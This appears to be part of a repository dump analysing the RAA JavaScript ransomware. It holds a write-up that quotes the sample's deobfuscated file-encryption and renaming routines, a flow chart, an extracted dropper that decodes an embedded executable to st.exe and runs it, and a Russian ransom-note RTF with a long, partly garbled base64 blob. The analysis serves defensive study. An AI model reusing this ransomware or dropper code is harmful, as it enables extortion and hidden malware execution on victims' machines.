  return 0;\n}\n```\n\nThis function takes encrypted file, creates new _ADODB.Stream_ object and uses it to save that file into new one, adding extension _.locked_ at the end of original name.\n\n```javascript\nvar DmYbWSaT = new ActiveXObject(\"Scripting.FileSystemObject\");\nDmYbWSaT.MoveFile(IMhTname, IMhTname += \".locked\");\n```\nMethod _MoveFile_ (https://msdn.microsoft.com/en-us/library/2wcf3ba6(v=vs.84).aspx) is responsible for the worst part of whole operation: it takes two arguments, source name and destination name,\nand overrides original, not encrypted file name with the new, encrypted version.\n\nSecond function used in encryption process is \n\n```javascript\nfunction qqJ(IMhTname) {\n    var SlSPWu = WScript.CreateObject(\"ADODB.Stream\");\n    SlSPWu.CharSet = '437';\n    SlSPWu.Open();\n    SlSPWu.LoadFromFile(IMhTname);\n    var FhDYKCTNZFu = WScript.CreateObject(\"ADODB.Stream\");\n    FhDYKCTNZFu.CharSet = '437';\n    FhDYKCTNZFu.Open();\n    var GinRqOjln = OQlYdejWlC(90000, 125000);\n    var PRuJZyAvfeza = SlSPWu.Size;\n    var VVe = SlSPWu.ReadText(GinRqOjln);\n    var cBKyRXWGPWBs = ukBnxEOtjm(VVe);\n    cBKyRXWGPWBs = String(cBKyRXWGPWBs);\n    var rMkTeqZm = cBKyRXWGPWBs.length;\n    SlSPWu.Position = PRuJZyAvfeza - GinRqOjln;\n    var ECgBWYtoib = SlSPWu.ReadText(GinRqOjln);\n    var AblANuF = ukBnxEOtjm(ECgBWYtoib);\n    AblANuF = String(AblANuF);\n    var QfYmGGcYOFB = AblANuF.length;\n    var IJDZ = \",\";\n    SlSPWu.Position = PRuJZyAvfeza - GinRqOjln;\n    SlSPWu.SetEOS;\n    SlSPWu.WriteText(cBKyRXWGPWBs);\n    SlSPWu.WriteText(AblANuF);\n    SlSPWu.WriteText(rMkTeqZm);\n    SlSPWu.WriteText(IJDZ);\n    SlSPWu.WriteText(QfYmGGcYOFB);\n    SlSPWu.WriteText(IJDZ);\n    var ids = \"IDNUM=\" + cVjZujcP + \"KEY_LOGIC=\" + HZtSmFNRdJM_data[0] + \"IV_LOGIC=\" + qPCIyff[0] + \"LOGIC_ID=3\";\n    SlSPWu.WriteText(ids);\n    SlSPWu.Position = GinRqOjln;\n    SlSPWu.CopyTo(FhDYKCTNZFu);\n    SlSPWu.Close;\n    FhDYKCTNZFu.SaveToFile(IMhTname, 2);\n    FhDYKCTNZFu.Close;\n    var DmYbWSaT = new ActiveXObject(\"Scripting.FileSystemObject\");\n    DmYbWSaT.MoveFile(IMhTname, IMhTname += \".locked\");\n    return 0;\n}\n```\n\nThis function, as mentioned earlier, is responsible for encryption process of files bigger than 4,76 MB and smaller than 476 MB.\n\nIt works little different than previous one. First of all, it creates two Windows Script _ADODB.Stream_ objects and content of file to encrypt is loaded into **SlSPWu** with _LoadFromFile()_ method:\n\n```javascript\nvar SlSPWu = WScript.CreateObject(\"ADODB.Stream\");\nSlSPWu.CharSet = '437';\nSlSPWu.Open();\nSlSPWu.LoadFromFile(IMhTname);\nvar FhDYKCTNZFu = WScript.CreateObject(\"ADODB.Stream\");\nFhDYKCTNZFu.CharSet = '437';\nFhDYKCTNZFu.Open();\n```\n\nNext, file is being encrypted in chunks:\n\n```javascript\nvar GinRqOjln = OQlYdejWlC(90000, 125000);\nvar PRuJZyAvfeza = SlSPWu.Size;\nvar VVe = SlSPWu.ReadText(GinRqOjln);\nvar cBKyRXWGPWBs = ukBnxEOtjm(VVe);\ncBKyRXWGPWBs = String(cBKyRXWGPWBs);\nvar rMkTeqZm = cBKyRXWGPWBs.length;\nSlSPWu.Position = PRuJZyAvfeza - GinRqOjln;\nvar ECgBWYtoib = SlSPWu.ReadText(GinRqOjln);\nvar AblANuF = ukBnxEOtjm(ECgBWYtoib);\nAblANuF = String(AblANuF);\nvar QfYmGGcYOFB = AblANuF.length;\nvar IJDZ = \",\";\nSlSPWu.Position = PRuJZyAvfeza - GinRqOjln;\nSlSPWu.SetEOS;\n```\n\nChunk size (**GinRqOjln**) is calculated from byte 0 to randomly selected byte between 90000 and 125000. Each chunk is encrypted result of encryption is assigned to a string by calling _String_ constructor directly on this result, eg. ```cBKyRXWGPWBs = String(cBKyRXWGPWBs);```\n\nEverything, together with some additional information, like length of last string, is then write to **SlSPWu** stream:\n\n```javascript\nSlSPWu.WriteText(cBKyRXWGPWBs);\nSlSPWu.WriteText(AblANuF);\nSlSPWu.WriteText(rMkTeqZm);\nSlSPWu.WriteText(IJDZ);\nSlSPWu.WriteText(QfYmGGcYOFB);\nSlSPWu.WriteText(IJDZ);\nvar ids = \"IDNUM=\" + cVjZujcP + \"KEY_LOGIC=\" + HZtSmFNRdJM_data[0] + \"IV_LOGIC=\" + qPCIyff[0] + \"LOGIC_ID=3\";\nSlSPWu.WriteText(ids);\nSlSPWu.Position = GinRqOjln;\n```\n\nFinally, content of **SlSPWu** stream is copied into **FhDYKCTNZFu**, and the same operation as in **omaDplUyHou()** is performed: change file name to the one with _.locked_ extension and then override original file with encrypted version.\n\n--\n\n### End of the process\n\nWhen all files are encrypted, there are couple of lines left to execute in RAA.\n\nFirst, Windows Registry is updated with entry that RAA finished its dirty job:\n\n```javascript\nvar FYSAj = WScript.CreateObject(\"WScript.Shell\");\nFYSAj.RegWrite(\"HKCU\\\\RAA\\\\Raa-fnl\\\\\", \"beenFinished\", \"REG_SZ\");\n```\n\nNext, _.rtf_ file with information message is copied into Desktop and opened with Wordpad:\n\n```javascript\nvar IvTV = \"C:\\\\\" + \"!!!README!!!\" + TBucypWw + \".rtf\";\nvar xfejSVYO = new ActiveXObject(\"Scripting.FileSystemObject\");\nvar Nnz = FYSAj.SpecialFolders(\"Desktop\");\nNnz = Nnz += \"\\\\\";\nxfejSVYO.CopyFile(IvTV, Nnz);\nvar rdm_fl = \"wordpad.exe\" + \" \" + IvTV;\nFYSAj.Run(rdm_fl, 3);\nreturn 0;\n```\n\nThis file contains information about where and how affected user can contact to get decryption key, after paying some amount of money, in Bitcoins.\n\n\n## Summary\n\nAs a web developer, I used to write JavaScript code for a little bit different purposes. AngularJS, React, Single Page Applications, Node and server side JS as well - this stuff. \n\nBut RAA confirms that JavaScript can be used for, literally, everything. Even for creating the worst nightmare of each user, which is ransomware. \n\nAnd not only RAA uses JavaScript for such things. @hasherezade recently described in details Locky ransomware downloader script, which is also created in JavaScript (see https://blog.malwarebytes.com/threat-analysis/2016/07/from-locky-with-love-reading-malicious-attachments/ )\n\nAlso, obfuscation of JavaScript code in similar malware is insane. In \"Return of Locky\" blogpost (https://malcat.moe/?p=53) you can follow process of deobfuscation Locky ransomware code. JavaScript variables and function names can be refer in many ways eg. object property identifier can be defined as concatenated string of mixed UTF, hexadecimal and plain text chunks, reverted, encoded and reverted once again.\n\nBut one fact is very important here: every single JavaScript runtime environment needs JavaScript code in plaintext to be able to  execute it. Any browser JavaScript engine, V8, node.js, io.js or even Windows Script Host. That simply means it is **always** possible to get any JavaScript obfuscated code into something readable and executable in Node.js or web browser.\n\n--\n\n## Links, references\n\n\nSource code of RAA:\n\n**malwr.com**\nhttps://malwr.com/analysis/YmE4MDNlMzk2MjY3NDdlYWE1NzFiOTNlYzVhZTlkM2Y/\n\n\n**SophosLabs blog**\t\t\t\n\nSophos blog post about RAA:\n\nhttps://nakedsecurity.sophos.com/2016/06/20/ransomware-thats-100-pure-javascript-no-download-required/\n\n\n\n**RAA – An entirely new JS ransomware delivering Pony malware**\n\nVery detailed analysis of RAA, by ReaQta:\n\nhttps://reaqta.com/2016/06/raa-ransomware-delivering-pony/\n\n\n**Locky downloader script analysis by @hasherezade**\n\n"
  },
  {
    "path": "raa-ransomware-analysis/execution-flow-chart.txt",
    "content": "\n\t\n\tYUIMqkFkI()\n\t\t|\n\t\t|\n\t\tv\n\tnYuMHHRx()\n\tNWvQtGjjfQX()\n\t\t|\n\t\tv\n\tzQqUzoSxLQ() ---> HxBG()\n\t\t\t\t\t\t|\n\t\t\t\t\t\t|\n\t\t\t\t\t\tv\n\t\t\t\t\ttry {\n\t\t\t\t\t\tuTNMmZ() --------\n\t\t\t\t\t} catch {\t\t\t|\n\t\t\t\t\t\tizzU()\t\t\t|\n\t\t\t\t\t}\t  |\t\t\t\t|\n\t\t\t\t\t\t  |\t\t\t\t|\n\t\t\t\t\t      |\t\t\t\tv\n\t\t\t\t\t\t  |\t\t\tNdpcNJVAPrNj()\n\t\t\t\t\t\t  |\t\t\t\t|\n\t\t\t\t\t\t  |\t\t\t\tv\n\t\t\t\t\t\t  |<-----------izzU()\n\t\t\t\t\t\t  |\n\t\t\t\t\t\t  v\n\t\t\t\t\tiKTzQKbfDJs()\n\t\t\t\t\t      |\n\t\t\t\t\t      v\n\t\t\t\t\tPLnEyqCPKHV()\n\t\t\t\t\t\t  |\n\t\t\t\t    nXmsNjMpKTv()\n\t\t\t\t          |\n\t\t\t\t\tdo {\n\t\t\t\t\t\tKWgwJwOlqJcs(file_to_encrypt)\n\t\t\t\t\t} while (files_to_encrypt)\n\n\n\n\n"
  },
  {
    "path": "raa-ransomware-analysis/extracted/dec_cmd_decrypted.js",
    "content": "var flo = new ActiveXObject (\"ADODB.Stream\");\nvar runer = WScript.CreateObject(\"WScript.Shell\");\nvar wher = runer.SpecialFolders(\"MyDocuments\");\nwher = wher + \"\\\\\" + \"st.exe\";\nflo.CharSet = \"437\";\nflo.Open();\nvar pny = data_pn.replace(/NMSIOP/g, \"A\");\nvar pny_ar = CryptoJS.enc.Base64.parse(pny);\nvar pny_dec = pny_ar.toString(CryptoJS.enc.Utf8);\nflo.Position = 0;\nflo.SetEOS;\nflo.WriteText(pny_dec);\nflo.SaveToFile(wher, 2);\nflo.Close;\nwher = \"\\\"\" + wher + \"\\\"\";\nruner.Run(wher);\n"
  },
  {
    "path": "raa-ransomware-analysis/extracted/extracted_rtf.rtf",
    "content": "{\\rtf1\\ansi\\ansicpg1251\\deff0\\deflang1049{\\fonttbl{\\f0\\fswiss\\fprq2\\fcharset204{\\*\\fname Arial;}Arial CYR;}{\\f1\\fnil\\fcharset0 ;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green0\\blue0;\\red0\\green0\\blue255;\\red192\\green192\\blue192;\\red128\\green128\\blue128;}\r\n{\\*\\generator Msftedit 5.41.15.1515;}\\viewkind4\\uc1\\pard\\nowidctlpar\\cf1\\b\\f0\\fs22\\'ce\\'f8\\'e8\\'e1\\'ea\\'e0! Error code (0034832)\\par\r\n\\cf2\\b0\\fs24\\par\r\n\\fs22\\'dd\\'f2\\'ee\\'f2 \\'e4\\'ee\\'ea\\'f3\\'ec\\'e5\\'ed\\'f2 \\'e1\\'fb\\'eb \\'f1\\'ee\\'e7\\'e4\\'e0\\'ed \\'e2 \\'e1\\'ee\\'eb\\'e5\\'e5 \\'ed\\'ee\\'e2\\'ee\\'e9 \\'e2\\'e5\\'f0\\'f1\\'e8\\'e8 \\b MS Word \\b0\\'e8 \\'ed\\'e5 \\'ec\\'ee\\'e6\\'e5\\'f2 \\'e1\\'fb\\'f2\\'fc \\'ee\\'f2\\'ea\\'f0\\'fb\\'f2 \\'c2\\'e0\\'f8\\'e5\\'e9 \\'e2\\'e5\\'f0\\'f1\\'e8\\'e5\\'e9 WordPad\\par\r\n\\'ce\\'e1\\'f0\\'e0\\'f2\\'e8\\'f2\\'e5\\'f1\\'fc \\'ea \\'e8\\'e7\\'e4\\'e0\\'f2\\'e5\\'eb\\'fe \\'f4\\'e0\\'e9\\'eb\\'e0 \\'e8\\'eb\\'e8 \\'ee\\'f2\\'ea\\'f0\\'ee\\'e9\\'f2\\'e5 \\'f1\\'ee\\'e4\\'e5\\'f0\\'e6\\'e8\\'ec\\'ee\\'e5 \\'ef\\'f0\\'e8 \\'ef\\'ee\\'ec\\'ee\\'f9\\'e8 \\b MS Word 2013\\cf3\\fs24\\par\r\n\\cf0\\b0\\fs20\\par\r\n\\cf2\\b\\'cd\\'e5\\'ea\\'ee\\'f2\\'ee\\'f0\\'fb\\'e5 \\'fd\\'eb\\'e5\\'ec\\'e5\\'ed\\'f2\\'fb \\'f1\\'ee\\'e4\\'e5\\'f0\\'e6\\'e8\\'ec\\'ee\\'e3\\'ee \\'ec\\'ee\\'e3\\'f3\\'f2 \\'ee\\'f2\\'ee\\'e1\\'f0\\'e0\\'e6\\'e0\\'f2\\'fc\\'f1\\'ff \\'ed\\'e5\\'ea\\'ee\\'f0\\'f0\\'e5\\'ea\\'f2\\'ed\\'ee\\cf1\\par\r\n\\cf2\\fs24 --------------------------------------------------------------------------------------------\\cf1\\par\r\n\\cf4\\par\r\n\\cf5\\b0\\fs22 4pWezqbPhM+G4oG/IMO7IM6mwrHiiaXOteKJiM+GzqbOqSDiiaHOsc6jzrXCseKJpc6mOyDPhs61IM6TwrHilqDOo+KJpCwgz4DOo8+DIOKIqeKBv8+D4omlIOKJpc61zrTiiKnOsSwg4omhzrXOo8+GzqbOqc6mIM614oml4omhzrHOk860z4PPhuKImi4gDQriloAgzrTilqDDn8604pagIM6TwrHPgyDiiYjOpsKx4omlzrXPgzsgwqAgz4bPgyDiiKnPg+KJoc+Dz4bOtcKw4omkIM++DIM614oip4omkwrHiiaXOtcKwz4PPhs6mz4PiiJ4gzqYgz4DiiaHOsc6jzrXiiJ4gz4bOwrHCoCDOkyDCsc6x4oie4omk4pagIM6T4oiawrHigb8sIOKJiOKJpc61w5/iiJogzpPPhs61zpPigb8gzrXDn+KJoc+DwrHiiaXOpiDOpsKx4omlzrXiiYjPhs6mzqkg4omhzrHOo861wrHiiaXOpiEgDQrilawsIMKgIM+GzrHCsM+DzrQgz4PPgM61LCDDn+KJoc6x4oml4oG/wqAg4oiezrXOpiEg4pWfzqPPg8Kx4oG/LCDPhs6xzpPPg+KJoeKMoeKJpCwgw5/igb/Pg+KJpSDCsuKJpc614omlIOKJoc61zqPPhs6mzqkhIOKUrMKxz4MgwrXPgyDPg8Kx4oml4oG/IMK1zqbPhM+G4oG/LCDOteKJpSDOqc614omlzrXiiaHOtc6YIM+Gz4Mg4oip4oG/4pag4omlIOKJpMKx4omlzrEgz4bPg+KJiM6mwrHiiaXiiJrijKEhIA0K4pWkzrTOpsKwzqnOteKIniDDn+KJpOKJoc+GzrUg4oml4oiaIMOf4oG/z4PCsOKBvywgzqbCseKJpc614omIz4bOps6pIOKJoc6xzqPOtcKx4omlzqYhIOKVq86xwrHiiaXOtSDOteKIqeKJpMKx4omlzrXCsM6xz4PCsOKBvyDiiaXiiJogzqniiaTDn861zqksIMKx4oml4omhz4PiiJ7CoMKx4oG/IM+GzrHiiKnOtc60z4bOpuKJpeKBvyDPg8+AzrUhIA0K4pWaIOKIqeKJoc6mw5/OtM6mwrXOscKgwrHigb8gzqkg4omlz4PDn8+DLCDCoCDPg+KImc+DIM6jzrXOtMK1z4PPhiDPhs6x4omk4omIzqbiiaXigbsSDiiKnOtM61zqPOteKJoc61zqPPhuKIms+DIOKIqc61zrTCoCwgzpPCsc+Dz4DOtSDOtM6mwrDigb8g4oyhzrXiiaXPg860zqYg4oipzrXCseKJpc6xzpPOpuKJpeKBvyDiiKnCoOKJpeKJpCDCsc6TzrXilqAgz4bOsSDPgM60zrXiiaXOqeKJpCDiiaXOtc604oip4oiaLCDiiYjiiaXOtcOf4oiaIM+EzrHiiaXOqc+G4omk4oml4oG/IM+Dz4MuIA0K4pWfz4bOseKJpeKBvywg4omI4omlzrUgwrHOseKIns61zpggwrXOps+Ez4bOpiDPhuKJpMK1z4biiJogzpPiiaHOscK1zqPOsSwgzqYgwrHiiJ7Pg+KJoeKJpeKBvywgzqYgzqniiaHPg8Kx4oml4oiaIM6jzrTCoCDiiaHOscKx4oipwqDiiaXOps6YLCDDuyDCsuKJpc61IM+D4oiZz4Mgz4bPgyDiiaXOteKJpSDOqeKJpMKxzrXOqSwgzqnOteKJpc614omh4oia4oieIM6jzrHOk86mzrTCscKgIMKgIMOfzrXOtOKBv8Kwz4MgzpPCsc+Dz4DOtS4gDQrilZDOtSDOqc61z4DOo86xIM6TzrXiiKniiaHOtcKwzrHOtCDCoCwgzpPOteKIqeKJoc61wrEgz4TOscKx4oml4omhz4POk86xzrQgzpMgz4DOteKJoc60z4Mg4omkIOKIns+Dz4bCoDogzqnOsc6pPyDPhs+D4omkwrXPg860zqYgwrXOps+Ez4bOpiDPhuKJpMK1z4bOsSDOpiDCsuKJpc6xIMKxzpPOtc60zrXiiYjigb8/IA0K4pWQ4omkwrXPhuKImiDOteKJpeKJoc6xzpPOtM+Dz4bPhuKIms+DIM6mwrHiiaXOteKJiM+GzqbOqc6mLCDPhM60zrXOk861z4bPhuKIms+DIM6pzrXCseKJpeKJoeKImiwgz4DiiaHCoM+Ez4biiJrPgyDCsc+G4oiaIM6mIOKJiM+D4omhzpPOpiDOkyDijKHOtM+Dw5/PgyDCtc6mz4TPhs6mPyANCuKVmiDPhs+DIM+Gz4PPhs6xzpPOpsKx4oml4oG/LCDOsSDOteKJpc6T4omhzrHiiJnPg8+GzqbPgyDCtc6xzqPPhs61IOKIqc61wrXOpuKJoc6xzrTOtSDCtc6mz4TPhuKBvyDiiJ7OteKWoCEg4pWsLCDOqc6xzqkg4omIzrHCseKJpc61IOKJpcKgz4DOteKJpc6mzrTCscKgIMKgIM6jzrHCtc+DIM6j4omk4oyhzrXiiJ4gwrHOk861zqbiiJ4sIM6pzrXPgM6jzrEgzrXDn8+GzrHiiaHiiaTCtc6mzrQsIOKJiOKJpc61IM6mIOKJpCDCsuKJpc61z4DOtSDCscOf4omhzrXOo86xIM+DwrHiiaXigb8gzqPiiaTijKEhIA0K4pWaIM614omlIM+AzrXCseKIqc61zqPCseKJpc6T4omk4pag4oiZzqbijKEgzrXiiaXOk8+D4omhz4biiaTOtMKxwqAgwqAsIM6pzrXPgM6jzrEg4omkzpPOps6jz4POtCwg4omI4omlzrUgzrXPhs6mIM+GzrHPhOKIms6TzrHilqDiiaUgz4DOtcKx4oipzrXOo8Kx4omlzpPOteKInjog4oiez4POtM614omIz4bOtSDiiaXOteKJoc+AzrXOk86x4oml4oG/wrHCoCDPhM6xIM6TzrTOscKx4oml4oG/IMKxIOKJpc61zrTiiKnOtc6YISANCuKVns6mzrQgwqAgwrHiiaHPg86jzqYgz4bOseKJoc61zqPOtc6TLCDPhM6x4omlzqnPhuKJpM6TIOKJpMKwzqYsIOKJiOKJpMK1zrXOmCDOpuKIniDiiKnOtSDCoM+E4oiazqniiaQ6IOKJiOKJpc61w5/iiJogz4bPgyDiiKniiaHOpsOfzrTOpsK1zrHOtMKxwqAgzqnOtSDiiJ7Phs+DIM+EzpPiiaTOqSDiiaHPg+KJiM+DzpggzqbijKEsIM6m4oyhIMKgz4TiiJrOqSDDn86x4omh4oiawrDPhs6mzqnOtc6TIM6mIOKJpc614omhz4DOscKwz4POmCDOk860zrHCseKJpeKBv+KWoC4gDQrilZ/OscK1zrHOkyDPhs61wrEsIOKJpM+G4oiazrTOtSDiiKniiaHOteKMoc61zqPOps60IMKgIOKJiM+D4omhz4PPhCDOk8Kxz4MgzpPiiYjPg+KJoc6xwrDPhs+Dz4MgzqYgwrHPg8+AzrXOo8+GwqDCsM+Gz4PPgzog4oipzrXOpsKx4omlzqbPhs+DLCDiiJ7Pg+KJoc+EzqnOtSDiiKnOseKMoc+Gz4PiiaUgzqYg4omlzrUsIM6mIM6j4omh4omkz4DOtc+DIOKJpCDCscOf4omhzrXOo86xIOKIqc6mwrHOsc6pISANCuKUgM61zrTPgM61IMK1zqbOtCDCoCwg4oipzrXOo861w5/Phs61IM6pzrHOtM+DzqnPgywgw7sgz4DOtOKJpOKMoc6m4oieLCDCsc60z4PiiKniiJriiJ4gzqYgz4bPg+KInuKImuKInjogzrTOpsKw4oG/IMOf4oiaIOKIqc61zqPOsc604oG/wrDPgyDOteKJpSDOk860zrHCseKJpc6T4omk4pag4oiZz4POmCwg4oipzqbCsOKJpOKImc+DzpggzqYgzpPPg8Kxz4POtMKg4oiZz4POmMKxwqAgwrHOk861zrTOteKJiM6mISANCuKVpCDiiaXiiaHiiaTOo8614oieIM6mIM61wrHiiaXOteKJoc61wrXPhs61wrHiiaXigb/ilqAgzpPOtcKx4oyhzrXOo86mzrQgzqPiiaTijKEg4oiezrXOmCDiiKnOtSDCseKJpeKJpOKIqc+Dz4bCoOKInjsgzqniiaHOteKMoc6mIOKJoc6xzqPOtcKx4omlzqYgw5/iiJrOtM6mIOKJpMKxzrTOsc6jzrXOmCDPg+KInuKJpDsgzqYgwrEg4oipzrXCsc614oyhzrXiiJ4gwrHOtM+D4oipw7fOsSDOk860zrHiiYjOps60zrHCseKBvyDCtc6mz4TPhuKBvyDiiJ7OtcKgLiANCuKVq+KJpc61IMK1z4MgwrHOtOKJpOKJiM6mzrTOtcKx4oG/IMKxzrUg4oiez4bOtc6YPyDilanOsc6pIM6mz4TDn86xzpPOps60wrHCoCDCoCDOteKJpSDOteKJpc6T4omhzrHiiJnPg8+GzqbCoD8g4pWp4omlzrUgzrXDn8+GzrXOk86mzrQgzpPPhM614omhIOKIns61zpg/IOKVqc6xzqkgzpPOtc+Ez4bPg8KxwrHCoCDCoCDPhs6xIOKJpc+DIM6T4oiawrHOteKJpeKImiwgz4DOo8+Dz4bPhuKImuKMoSDiiJ7OteKJoc6jIM6mIMK1zrHCtc6j4oiaIM+Gz4PiiYjOpsKx4oml4oia4oyhLiANCuKVrM+GzqYgw5/iiaHOtcKxzqbOtM6mIM6Tz4TOteKJoSDCsc6TzrXOmCDOkyDiiaHOtc6jz4bOps6pOiDOpiDOk8614omlIMO7IMKxzpPPg+KJpc6m4omlwrHCoCDiiJ7Phs+DIM614oml4oml4omkzqPOsSDiiJ7Pg+KJoc+EzqnOscKgIOKJpM604oiaw5/Oqc6xIM6m4oyhLiANCuKVpM6TwqDiiJnPg8+Gz4biiaTilqAgzpPOtc6j4omkIM614oml4omhzrHOk86mzrTOpiDOtc++Ez4bOpiDOteKJpc6T4omhzrHiiaXOps60zqbCseKBvyDiiaXOtc604oG/zqnOtSDOteKJpSDiiaXOtc604oip4oiaOiDOpsOfzrUgz4bPgyDijKHOteKJpc+DzrTOpiDiiaHOsc+EzqPPg860wqDiiaXigb8gwrEgz4bPg86YIM+GzqYgzpPOtc6j4oiaLCDPhs6mIM61z4DPhsKgLCDPhs6mIOKIqc60zrXOo861zpMuIA0K4pWaIOKIns+GzrXPgM6mz4Mg4omk4oyhzrXOo86mzpPCsM6mz4MgzpMg4oip4omkwrHiiaXiiJrPhuKWoCDOqSDijKHOpuKImc+G4oia4oieIM+EzpPPg+KJocKg4oieIM6mIM6mz4TPhs+D4oiezrXPgM6xzpPCsM6mz4Mg4omlzrHiiJ4gzrXiiaUgwrXOscK1zqPiiJosIM60zqbCsOKBvyDPhs+DIOKMoc614omlz4POtM6mIMKxzqbOo8+D4oml4oG/IOKJpCDOk861zqPOtc+D4oiezrEgzpPiiJ7Pg8Kx4omlz4MgwrEgz4DiiaHCoM+Ez4biiJriiJ7OpiDiiKnOtc+AzrXPhuKImc6mzqnOseKIns6mIM6Tz4PiiaHDn8604pagzqPOtc6TLiANCuKVmiDiiJ7Phs61z4DOps+DLCDiiKniiaHOpuKMoc61zqPOps6TwrDOps7iiJogz4bPgyDiiaTPgM614omlzrXOk86mzrTOpiDPhM6jz4PCseKBvyDCtc6mzrTOpuKImc6xIM6jzrTCoCDPhs6m4oyhISDilabPg86jwqDPhs61zpgg4oipz4PiiJnPg+KJoc61zpgg4oipzrXOqc6xz4TOsc60zrXCseKBvyDDn+KImiDCseKJiM6xwrHiiaXigb/PgyDPhs6xwrDPgyDOo860wqAgzqbijKEg4omlz4POtM6xIM6mIM6j4omk4oyhzrEhIA0K4pWaIM6pzrHOqSDiiJ7Otc+A4omk4omIzqbPgyDOk8+D4oml4omh4oiaIMKx4omlzrHPhs+D4oieIOKInuKImiDCtc6m4oml4oG/IMDISDilazPhs6mIMOf4oiaIM6TzrXOtcOf4omhzrHPhM6mzrTOpiwg4omI4omlzrUg4oipzrXCtc6m4omhzrHilqDiiaUgzrXPgM61z4bigb8sIM6mIM61w5wrXOscKgwrHigb8gzqkg4omlz4PDn8+DLCDCoCDPg+KImc+DIM6jzrXOtMK1z4PPhiDPhs6x4omk4omIzqbiiaXigbxISDilazPhiDOteKJpc6Tz4PiiaXOpuKJpSDOk86x4oieIOKJpM604oiaw5/Oqc61zpggwrHOk861z4POmCDiiYjOpsKx4omlzrXiiaXiiJohIA0K4pWQzrEgzqPiiaHPg86Tz4Mgw5/iiaTOo+KJpOKImc+Dz4DOtSDCseKJpeKJoc61zqbiiJ4g4oie4oiaIM+Az4bPg8+EzqPOtSDCsc6TzrXPgzsgzrXiiaHOtOKImiDOkyDCsc6TzrXOpuKMoSDOqc604pagzpPOseKMoSDDn+KJpM6j4omk4omlIOKIqeKJoc6mz4bOtcKxzqbiiaXigb8gz4bOseKIniwgzrXOo86mz4bOtc6pzqbiiJ4sIOKIqc6m4oiZ4omkISANCuKVp861zqbCseKJpc6mz4bPgywgz4bPgyDiiaXiiaQsIM6pzrXiiaXOteKJoeKJpOKWoCDOk86p4omkwrDOseKWoOKJpSDPhs+D4omIzqbCseKJpeKIms+//OtcK1z4DOtM6mIMOf4oiaIOKIns614omhzqPiiJogwrHOk861zqYhIA0K4pWnzrXOpsKx4omlzqbPhs+DLCDiiJ\\par\r\nE4omhz4POtM6m4oiZzrEgzrXCsc6pzrHOtM++G4oia4oieIM+EzpPPg+KJocKg4oieIM6mIM6mz4TPhs+D4oiezrXPgM6xzpPCsM6mz4Mg4omlzrHiiJ4gzrXiiaUgwrXOscK1zqPiiJosIM60zqbCsOKBvyDPhs+DIOKMoc614omlz4POtM6mIMKxzqbOo8+D4oml4oG/IOKJpCDOk861zqPOtc+D4oiezrEgzpPiiJ7Pg8Kx4omlz4MgwrEgz4DiiaHCoM+Ez4biiJriiJ7OpiDiiKnOtc+AzrXPhuKImc6mzqnOseKIns6mIM6Tz4PiiaHDn8604pagzqPOtc6TLiANCuKVmiDiiJ7Phs61z4DOps+DLCDiiKniiaHOpuKMoc61zqPOps6TwrDOps7iiJogz4bPgyDiiaTPgM614omlzrXOk86mzrTOpiDPhM6jz4PCseKBvyDCtc6mzrTOpuKImc6xIM6jzrTCoCDPhs6m4oyhISDilabPg86jwqDPhs61zpgg4oipz4PiiJnPg+KJoc61zpgg4oipzrXOqc6xz4TOsc60zrXCseKBvyDDn+KImiDCseKJiM6xwrHiiaXigb/PgyDPhs6xwrDPgyDOo860wqAgzqbijKEg4omlz4POtM6xIM6mIM6j4omk4oyhzrEhIA0K4pWaIM6pzrHOqSDiiJ7Otc+A4omk4omIzqbPgyDOk8+D4oml4omh4oiaIMKx4omlzrHPhs+D4oieIOKInuKImiDCtc6m4oml4oG/IMDISDilazPhs6mIMOf4oiaIM6TzrXOtcOf4omhzrHPhM6mzrTOpiwg4omI4omlzrUg4oipzrXCtc6m4omhzrHilqDiiaUgzrXPgM61z4bigb8sIM6mIM61w5wrXOscKgwrHigb8gzqkg4omlz4PDn8+DLCDCoCDPg+KImc+DIM6jzrXOtMK1z4PPhiDPhs6x4omk4omIzqbiiaXigbxISDilazPhiDOteKJpc6Tz4PiiaXOpuKJpSDOk86x4oieIOKJpM604oiaw5/Oqc61zpggwrHOk861z4POmCDiiYjOpsKx4omlzrXiiaXiiJohIA0K4pWQzrEgzqPiiaHPg86Tz4Mgw5/iiaTOo+KJpOKImc+Dz4DOtSDCseKJpeKJoc61zqbiiJ4g4oie4oiaIM+Az4bPg8+GzqYg4oipzrXijKHOteAzrUhIA0K4pWaIOKIqeKJoc6mw5/OtM6miiaHOseKImc6xz4PiiaUgzqbijKEgzpPPhM614omhIOKIqc60zrXOo861z4bOtcKxwqDiiJnPg8+DIM6jz4PiiaHPg86TzrUuIA0K4pWaIOKIns+GzrXPgM6mz4MgzrXiiaXOk8+D4omhz4biiaTOk8KwzqbPg8KxwqAgzrXiiaUgwrXOps+Ez4bOpiDOteKJpc6T4omhzrHiiaXOps60zqbCseKBvyDiiaXOtc604oG/zqnOtSDOteKJpSDiiaXOtc604oip4oiaOiDOpsOfzrUgz4bPgyDijKHOteKJpc+DzrTOpiDiiaHOsc+EzqPPg860wqDiiaXigb8gwrEgz4bPg86YIM+GzqYgzpPOtc6j4oiaLCDPhs6mIM61z4DPhsKgLCDPhs6mIOKIqc60zrXOo861zpMuIA0K4pWaIOKIns+GzrXPgM6mz4Mg4omk4oyhzrXOo86mzpPCsM6mz4MgzpMg4oip4omkwrHiiaXiiJrPhuKWoCDOqSDijKHOpuKImc/IMK1zqbPhM+G4oG/LCDOteKJpSDOqc614omlzrXiiaHOtc6YIM+Gz4Mg4oip4oG/4pag4omlIOKJpMKx4omlzrEgz4bPg+KJiM6mwrHiiaXiiJrijKEhIA0K4pWkzrTOpsKwzqnOteKIniDDn+KJpOKJoc+GzrUg4oml4oiaIMOf4oG/+KJpSDiiJ7Otc+DIMOf4omkzqPiiaTiiJnPg8+DLiANCuKVp861zqbCseKJpc6mz4bPgywg4pWfzrHiiaHOseKJpeKJpMKx4oml4omhzrEgw7sg4oiezrXPgOKJpOKJiM6mzpggzpPPg+KJpc+D4omhIM6jzrTCoCDOk8Kxz4PijKEgz4bOps+EzqbPhjsgzqYgzpPOteKJpSDiiYjiiaXOtSDCsc61zpPPg+KJpeKJpM+D4omlIM61z4YgzpPiiaHOsc+AzrHiiJ4gwrHOk861zqbiiJ4gzqYgzpPCsc+D4oieLCDOqeKJpc61IOKIqc604pagz4PiiaXCscKgOiAi4pS0z4PiiaHPg8+AzqbiiaXPg8Kx4oG/IOKIqc60z4POk86x4oml4oG/IOKIqeKJoc614omlzqbOkyDOk8+D4oml4omhzrEhIi4NCg0KDQrilaXOsc6pI